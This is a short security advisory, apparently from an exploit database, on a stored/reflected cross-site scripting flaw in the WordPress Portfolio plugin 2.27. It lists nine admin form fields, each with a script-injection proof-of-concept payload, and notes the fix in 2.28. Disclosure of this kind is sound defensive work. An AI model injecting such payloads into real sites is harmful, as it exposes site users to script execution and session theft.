WordPress Portfolio 2.27 Cross Site Scripting Vulnerability

2015-12-18T00:00:00
ID 1337DAY-ID-24748
Type zdt
Reporter Madhu Akula
Modified 2015-12-18T00:00:00

Description

WordPress Portfolio plugin version 2.27 suffers from a cross site scripting vulnerability.

                                        
                                            WordPress Portfolio 2.27 Cross Site Scripting Vulnerability

Plugin Name : Portfolio
 
Effected Version : 2.27 (and most probably lower version's if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula
 

Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :
 
The following fields put the payload as below
 
http://localhost/wp-admin/admin.php?page=portfolio.php
 
tag-slug = “><script>alert(1)</script>
prtfl_date_text_field = “><script>alert(2)</script>
prtfl_link_text_field = “><script>alert(3)</script>
prtfl_shrdescription_text_field = “><script>alert(4)</script>
prtfl_description_text_field = “><script>alert(5)</script>
prtfl_svn_text_field = “><script>alert(6)</script>
prtfl_executor_text_field = “><script>alert(7)</script>
prtfl_screenshot_text_field = “><script>alert(8)</script>
prtfl_technologies_text_field = “><script>alert(9)</script>
 
 
Vulnerable Parameter : tag-slug, prtfl_date_text_field, prtfl_link_text_field, prtfl_shrdescription_text_field, prtfl_description_text_field, prtfl_svn_text_field, prtfl_executor_text_field, prtfl_screenshot_text_field, prtfl_technologies_text_field
 
 
Type of XSS : Reflected / Stored
 
Fixed in : 2.28
 
http://wordpress.org/plugins/portfolio/changelog/

#  0day.today [2018-02-19]  #